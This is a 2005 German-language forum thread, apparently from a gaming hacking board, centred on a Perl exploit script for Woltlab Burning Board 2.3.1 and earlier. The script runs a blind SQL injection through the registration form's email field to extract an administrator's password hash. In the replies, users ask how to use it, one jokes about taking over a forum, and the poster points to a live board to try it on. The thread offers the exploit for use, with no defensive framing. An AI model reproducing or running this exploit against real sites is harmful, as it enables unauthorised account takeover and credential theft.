[Exploit] register für wbb

~~apple~~ · 06/19/2005, 21:29

Code:

#!/usr/bin/perl

use strict;
use IO&#58;&#58;Socket&#58;&#58;INET;


&#036;| = print &#34;
Woltlab Burning Board &#60;= 2.3.1 Exploit
Vulnerability discovered by GulfTech Security Research
Visit [url]www.security-project.org[/url]
Exploit by deluxe89
----------
&#34;;



my &#036;host = '[url]www.security-project.org';[/url]
my &#036;path = '/wbb2/'; # path to the board
my &#036;userid = 1; # the password hash will be from the user with this id
my &#036;username = 'deluxe89'; # any username from the board
my &#036;proxy = ''; # proxy, you can leave this empty
my &#036;error = 'E-Mail-Adresse ist unzulässig'; # use 'email address entered is already ta' for english boards


# proxy handling
my &#40;&#036;addr, &#036;port&#41; = &#40;&#036;proxy ne ''&#41; ? split&#40;/&#58;/, &#036;proxy&#41; &#58; &#40;&#036;host, 80&#41;;
if&#40;&#036;proxy ne ''&#41;
{
    print &#34;&#91;~&#93; Using a proxy&#092;n&#34;;
}
else
{
    print &#34;&#91;~&#93; You're using NO proxy!&#092;n&#34;;
    sleep&#40;1&#41;;
}





#
# Get the hash
#

print &#34;&#91;~&#93; Getting the hash. Please wait some minutes..&#092;n&#91;+&#93; Hash&#58; &#34;;


my &#036;hash = '';
for&#40;my &#036;i=1;&#036;i&#60;33;&#036;i++&#41;
{
    my &#036;sock = new IO&#58;&#58;Socket&#58;&#58;INET&#40;PeerAddr => &#036;addr, PeerPort => &#036;port, Proto => 'tcp', Timeout => 8&#41; or die&#40;'&#91;-&#93; Could not connect to server'&#41;;

    if&#40;&test&#40;&#036;i, 96&#41;&#41; # buchstabe
    {
        for&#40;my &#036;c=97;&#036;c&#60;103;&#036;c++&#41;
        {
            if&#40;&test&#40;&#036;i, &#036;c, 1&#41;&#41;
            {
                print pack&#40;'c', &#036;c&#41;;
                last;
            }
        }
    }
    else # zahl
    {
        #print &#34;0-4&#092;n&#34;;
        for&#40;my &#036;c=48;&#036;c&#60;58;&#036;c++&#41;
        {
            if&#40;&test&#40;&#036;i, &#036;c, 1&#41;&#41;
            {
                print pack&#40;'c', &#036;c&#41;;
                last;
            }
        }
    }
}
print &#34;&#092;n&#34;;


sub test
{
    my &#40;&#036;i, &#036;num, &#036;g&#41; = @_;

    my &#036;sock = new IO&#58;&#58;Socket&#58;&#58;INET&#40;PeerAddr => &#036;addr, PeerPort => &#036;port, Proto => 'tcp', Timeout => 8&#41; or die&#40;'Could not connect to server'&#41;;
    my &#036;value = &#34;sre4sdffr&#092;@4g54asd5.org' OR &#40;userid=&#036;userid AND ascii&#40;substring&#40;password,&#036;i,1&#41;&#41;&#34;;
    &#036;value .= &#40;&#036;g&#41; ? '=' &#58; '>';
    &#036;value .= &#34;&#036;num&#41;/*&#34;;
    my &#036;data = &#34;r_username=&#036;username&r_email=&#036;value&r_password=aaaaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_icq=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=&r_gender=0&r_signature=&r_usertext=&field%5B1%5D=&field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecookies=1&r_admincanemail=1&r_showemail=1&r_usercanemail=1&r_emailnotify=0&r_notificationperpm=0&r_receivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_timeformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer=viewed&#34;;

    print &#036;sock &#34;POST http&#58;//&#036;host&#036;{path}register.php HTTP/1.1&#092;r&#092;nHost&#58; &#036;host&#092;r&#092;nConnection&#58; Close&#092;r&#092;nContent-Type&#58; application/x-www-form-urlencoded&#092;r&#092;nContent-Length&#58; &#34;.length&#40;&#036;data&#41;.&#34;&#092;r&#092;n&#092;r&#092;n&#036;data&#092;r&#092;n&#34;;


    while&#40;&#60;&#036;sock>&#41;
    {
        if&#40;&#036;_ =~ m/&#036;error/&#41; { return 1; }
    }
    return 0;
}

~~blackseals~~ · 06/20/2005, 15:14

ûnd wofür is das ???

~~apple~~ · 06/20/2005, 15:22

damit kannste admin acc pasw rausbekommen

monstar · 06/20/2005, 15:24

sag mal board und acc und pw name bitte^^

~~apple~~ · 06/20/2005, 15:27

geht nur bei diesen versionen: 2.3.1

Und den admin acc kannste ja selber sehen !^^

~~blackseals~~ · 06/20/2005, 15:31

register für wbb, 2.3.1 SQL inject

was meinst ?? ich nicht ceck dat ^^

du "wirst" dan zum admin
wispher: geht das auch für elitepvpers ?? will hier die macht übernehmen

~~apple~~ · 06/20/2005, 15:36

lol ne

e*pvper is kein noob
und nimmt kein **** ******* wbb board :P

wbb suckz XD

und du bekommst damit das psw von dem admin acc

~~apple~~ · 06/21/2005, 11:36

da kÃ¶nnt ihr testen

HF

Maybe It's Maybelline · 06/21/2005, 16:43

Nein wbb ist eine andere software, Epvp benutzt
außerdem Invision Power Board(U) v1.3, dazu gibts auch ein paar sql injections falls die noch ned gefixxt sind xD

(forums)

SQL inject steht für SQL injection, das heißt das dein SQL Query(befehl) ausgeführt werden kann z.b Datenbank löschen, Root acess kriegen... etc

~~apple~~ · 06/21/2005, 17:31

uhhh, ich glaub die sind hier schon edited XD

monstar · 06/21/2005, 18:27

und was soll ich da jetz genau machen bei dem board?

Ani · 06/21/2005, 18:40

Die bei dem verlinkten Board usen aber 2.2.1 und nit 2.3.1 ._.

monstar · 06/21/2005, 19:06

was usen? wo was eingeben?
bin da der voll b00n^^

~~apple~~ · 06/21/2005, 19:09

müsste trozdem funzen ^^

Maybe It's Maybelline · 06/22/2005, 07:03

^^